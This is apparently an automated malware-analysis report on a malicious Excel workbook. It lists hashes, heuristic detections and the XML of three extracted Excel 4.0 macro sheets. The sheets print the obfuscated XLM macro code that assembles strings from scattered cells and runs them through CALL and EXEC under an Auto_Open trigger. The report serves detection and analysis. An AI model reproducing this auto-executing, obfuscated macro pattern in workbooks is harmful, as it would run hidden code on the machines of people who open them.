Office (OOXML) malware analysis — malicious · 77a9bea3fed8bdb9

MALICIOUS

Office (OOXML)

82.2 KB Created: 2006-09-16 00:00:00 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2021-04-01

MD5: 023126cdb5562fce6c879489c0d401d4 SHA-1: bbba0edfb3ea10a8c6f8dbcf3ce54788a47b9afd SHA-256: 77a9bea3fed8bdb9d20957e96f86c511d773ea21d7245aca5df12d5261f3e90d

182 Risk Score

Heuristics 4

Excel 4.0 macro sheet (3 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME

Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
Dangerous XLM formula APIs: FORMULA, CALL, HALT, EXEC critical OOXML_XLM_DANGEROUS_FN

Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.xml	6866 bytes
SHA-256: `92e029e4df7d07011197ed2fdc9fdb82ce9a048ae0564b1d71a1dc32f8dc1512`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="AU8:AY38"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="46" width="4.5703125" style="1"/><col min="47" max="51" width="4.5703125" style="1" hidden="1" customWidth="1"/><col min="52" max="16384" width="4.5703125" style="1"/></cols><sheetData><row r="8" spans="47:51" x14ac:dyDescent="0.25"><c r="AU8" s="3"/><c r="AV8" s="3"/><c r="AW8" s="3"/><c r="AX8" s="3"/><c r="AY8" s="3"/></row><row r="9" spans="47:51" x14ac:dyDescent="0.25"><c r="AU9" s="3"/><c r="AV9" s="3"/><c r="AW9" s="3"/><c r="AX9" s="3"/><c r="AY9" s="3"/></row><row r="10" spans="47:51" x14ac:dyDescent="0.25"><c r="AU10" s="3"/><c r="AV10" s="3"/><c r="AW10" s="3"/><c r="AX10" s="3"/><c r="AY10" s="3"/></row><row r="11" spans="47:51" x14ac:dyDescent="0.25"><c r="AU11" s="3"/><c r="AV11" s="3"/><c r="AW11" s="3"/><c r="AX11" s="3"/><c r="AY11" s="3"/></row><row r="12" spans="47:51" x14ac:dyDescent="0.25"><c r="AU12" s="3"/><c r="AV12" s="3"/><c r="AW12" s="3"/><c r="AX12" s="3"/><c r="AY12" s="3"/></row><row r="13" spans="47:51" x14ac:dyDescent="0.25"><c r="AU13" s="3" t="b"><f>FORMULA('Doc4'!$AT$3&'Doc4'!$AT$4&'Doc4'!$AT$5&'Doc4'!$AT$6&'Doc4'!$AT$7&'Doc4'!$AT$8,'Doc1'!$A$110)</f><v>1</v></c><c r="AV13" s="3"/><c r="AW13" s="3"/><c r="AX13" s="3"/><c r="AY13" s="3"/></row><row r="14" spans="47:51" x14ac:dyDescent="0.25"><c r="AU14" s="3" t="b"><f>FORMULA('Doc4'!AU3&'Doc4'!AU4&'Doc4'!AU5&'Doc4'!AU6&'Doc4'!AU7&'Doc4'!AU8&'Doc4'!AU9&'Doc4'!AU10&'Doc4'!AU11&'Doc4'!AU12&'Doc4'!AU13&'Doc4'!AU14&'Doc4'!AU15&'Doc4'!AU16&'Doc4'!AU17&'Doc4'!AU18&'Doc4'!AU19&'Doc4'!AU20,'Doc1'!A111)</f><v>1</v></c><c r="AV14" s="3"/><c r="AW14" s="3"/><c r="AX14" s="3"/><c r="AY14" s="3"/></row><row r="15" spans="47:51" x14ac:dyDescent="0.25"><c r="AU15" s="3" t="b"><f>FORMULA('Doc4'!AV3&'Doc4'!AV4&'Doc4'!AV5,'Doc1'!A112)</f><v>1</v></c><c r="AV15" s="3"/><c r="AW15" s="3"/><c r="AX15" s="3"/><c r="AY15" s="3"/></row><row r="16" spans="47:51" x14ac:dyDescent="0.25"><c r="AU16" s="3" t="b"><f>FORMULA('Doc1'!A100&'Doc1'!A101&'Doc1'!A102&'Doc1'!A103,'Doc1'!A113)</f><v>1</v></c><c r="AV16" s="3"/><c r="AW16" s="3"/><c r="AX16" s="3"/><c r="AY16" s="3"/></row><row r="17" spans="47:51" x14ac:dyDescent="0.25"><c r="AU17" s="3" t="b"><f>FORMULA('Doc4'!AW3&'Doc4'!AW4&'Doc4'!AW5&'Doc4'!AW6&'Doc4'!AW7&'Doc4'!AW8&'Doc4'!AW9,'Doc1'!A115)</f><v>1</v></c><c r="AV17" s="3"/><c r="AW17" s="3"/><c r="AX17" s="3"/><c r="AY17" s="3"/></row><row r="18" spans="47:51" x14ac:dyDescent="0.25"><c r="AU18" s="3" t="b"><f>FORMULA('Doc4'!AX3&'Doc4'!AX4&'Doc4'!AX5&'Doc4'!AX6,'Doc1'!A116)</f><v>1</v></c><c r="AV18" s="3"/><c r="AW18" s="3"/><c r="AX18" s="3"/><c r="AY18" s="3"/></row><row r="19" spans="47:51" x14ac:dyDescent="0.25"><c r="AU19" s="3"/><c r="AV19" s="3"/><c r="AW19" s="3"/><c r="AX19" s="3"/><c r="AY19" s="3"/></row><row r="20" spans="47:51" x14ac:dyDescent="0.25"><c r="AU20" s="3"/><c r="AV20" s="3"/><c r="AW20" s="3"/><c r="AX20" s="3"/><c r="AY20" s="3"/></row><row r="21" spans="47:51" x14ac:dyDescent="0.25"><c r="AU21" s="3"/><c r="AV21" s="3"/><c r="AW21" s="3"/><c r="AX21" s="3"/><c r="AY21" s="3"/></row><row r="22" spans="47:51" x14ac:dyDescent="0.25"><c r="AU22" s="3" t="e"><f>SUMPRODUCT(AY22,AY28,AY33,AY32:AY33,AY24:AY28)=CALL('Doc1'!$A$110,'Doc1'!$A$111,'Doc1'!$A$112,'Doc4'!AW13,'Doc1'!$A$113,'Doc1'!$A$106,'Doc4'!AW15,'Doc4'!AW16)=SUMPRODUCT(AY22,AY28,AY33,AY32:AY33,AY24:AY28)</f><v>#VALUE!</v></c><c r="AV22" s="3"/><c r="AW22" s="3"/><c r="AX22" s="3"/><c r="AY22" s="3"/></row><row r="23" spans="47:51" x14ac:dyDescent="0.25"><c r="AU23" s="3"/><c r="AV23" s="3"/><c r="AW23" s="3"/><c r="AX23" s="3"/><c r="AY23" s="3"/></row><row r="24" spans="47:51" x14ac:dyDescent="0.25"><c r="AU24" s="3" t="b"><f>'Doc1'!$AJ$5()</f><v>0</v></c><c r="AV24" s="3"/><c r="AW24" s="3"/><c r="AX24" s="3"/><c r="AY24" s="3"/></row><row r="25" spans="47:51" x14ac:dyDescent="0.25"><c r="AU25" s="3"/><c r="AV25" s="3"/><c r="AW25" s="3"/><c r="AX25" s="3"/><c r="AY25" s="3"/></row><row r="26" spans="47:51" x14ac:dyDescent="0.25"><c r="AU26" s="3"/><c r="AV26" s="3"/><c r="AW26" s="3"/><c r="AX26" s="3"/><c r="AY26" s="3"/></row><row r="27" spans="47:51" x14ac:dyDescent="0.25"><c r="AU27" s="3"/><c r="AV27" s="3"/><c r="AW27" s="3"/><c r="AX27" s="3"/><c r="AY27" s="3"/></row><row r="28" spans="47:51" x14ac:dyDescent="0.25"><c r="AU28" s="3"/><c r="AV28" s="3"/><c r="AW28" s="3"/><c r="AX28" s="3"/><c r="AY28" s="3"/></row><row r="29" spans="47:51" x14ac:dyDescent="0.25"><c r="AU29" s="3"/><c r="AV29" s="3"/><c r="AW29" s="3"/><c r="AX29" s="3"/><c r="AY29" s="3"/></row><row r="30" spans="47:51" x14ac:dyDescent="0.25"><c r="AU30" s="3"/><c r="AV30" s="3"/><c r="AW30" s="3"/><c r="AX30" s="3"/><c r="AY30" s="3"/></row><row r="31" spans="47:51" x14ac:dyDescent="0.25"><c r="AU31" s="3"/><c r="AV31" s="3"/><c r="AW31" s="3"/><c r="AX31" s="3"/><c r="AY31" s="3"/></row><row r="32" spans="47:51" x14ac:dyDescent="0.25"><c r="AU32" s="3"/><c r="AV32" s="3"/><c r="AW32" s="3"/><c r="AX32" s="3"/><c r="AY32" s="3"/></row><row r="33" spans="47:51" x14ac:dyDescent="0.25"><c r="AU33" s="3"/><c r="AV33" s="3"/><c r="AW33" s="3"/><c r="AX33" s="3"/><c r="AY33" s="3"/></row><row r="34" spans="47:51" x14ac:dyDescent="0.25"><c r="AU34" s="3"/><c r="AV34" s="3"/><c r="AW34" s="3"/><c r="AX34" s="3"/><c r="AY34" s="3"/></row><row r="35" spans="47:51" x14ac:dyDescent="0.25"><c r="AU35" s="3"/><c r="AV35" s="3"/><c r="AW35" s="3"/><c r="AX35" s="3"/><c r="AY35" s="3"/></row><row r="36" spans="47:51" x14ac:dyDescent="0.25"><c r="AU36" s="3"/><c r="AV36" s="3"/><c r="AW36" s="3"/><c r="AX36" s="3"/><c r="AY36" s="3"/></row><row r="37" spans="47:51" x14ac:dyDescent="0.25"><c r="AU37" s="3"/><c r="AV37" s="3"/><c r="AW37" s="3"/><c r="AX37" s="3"/><c r="AY37" s="3"/></row><row r="38" spans="47:51" x14ac:dyDescent="0.25"><c r="AU38" s="3"/><c r="AV38" s="3"/><c r="AW38" s="3"/><c r="AX38" s="3"/><c r="AY38" s="3"/></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/><headerFooter alignWithMargins="0"/></xm:macrosheet>
`xlm_sheet_01.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet2.xml	963 bytes
SHA-256: `5e0b317bc9eef478a9b391aa848d4ca25c6a2921bbc6af4ad6fc140f76188572`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A100"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="4.5703125" style="1"/></cols><sheetData><row r="100" spans="1:1" x14ac:dyDescent="0.25"><c r="A100" s="3" t="b"><f>HALT()</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><headerFooter alignWithMargins="0"/></xm:macrosheet>
`xlm_sheet_02.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet1.xml	2154 bytes
SHA-256: `ba879ec0f64b30e11e9087bbe56136dfd84f79126134f6d66e265bd1a4b7287c`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A5:AJ108"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="4.5703125" style="1"/></cols><sheetData><row r="5" spans="36:36" x14ac:dyDescent="0.25"><c r="AJ5" s="1" t="b"><f>""&""&""&""&""&""&""&""=EXEC('Doc1'!$A$115&"2 "&'Doc1'!$A$106&'Doc1'!$A$116)='Doc2'!A100()</f><v>1</v></c></row><row r="99" spans="1:2" x14ac:dyDescent="0.25"><c r="A99" s="3"/><c r="B99" s="3"/></row><row r="100" spans="1:2" x14ac:dyDescent="0.25"><c r="A100" s="3" t="s"><v>0</v></c><c r="B100" s="3"/></row><row r="101" spans="1:2" x14ac:dyDescent="0.25"><c r="A101" s="3" t="s"><v>1</v></c><c r="B101" s="3"/></row><row r="102" spans="1:2" x14ac:dyDescent="0.25"><c r="A102" s="4" t="s"><v>29</v></c><c r="B102" s="3"/></row><row r="103" spans="1:2" x14ac:dyDescent="0.25"><c r="A103" s="3" t="s"><v>2</v></c><c r="B103" s="3"/></row><row r="104" spans="1:2" x14ac:dyDescent="0.25"><c r="A104" s="3"/><c r="B104" s="3"/></row><row r="105" spans="1:2" x14ac:dyDescent="0.25"><c r="A105" s="3"/><c r="B105" s="3"/></row><row r="106" spans="1:2" x14ac:dyDescent="0.25"><c r="A106" s="3" t="s"><v>3</v></c><c r="B106" s="3"/></row><row r="107" spans="1:2" x14ac:dyDescent="0.25"><c r="A107" s="3"/><c r="B107" s="3"/></row><row r="108" spans="1:2" x14ac:dyDescent="0.25"><c r="A108" s="3"/><c r="B108" s="3"/></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/><headerFooter alignWithMargins="0"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.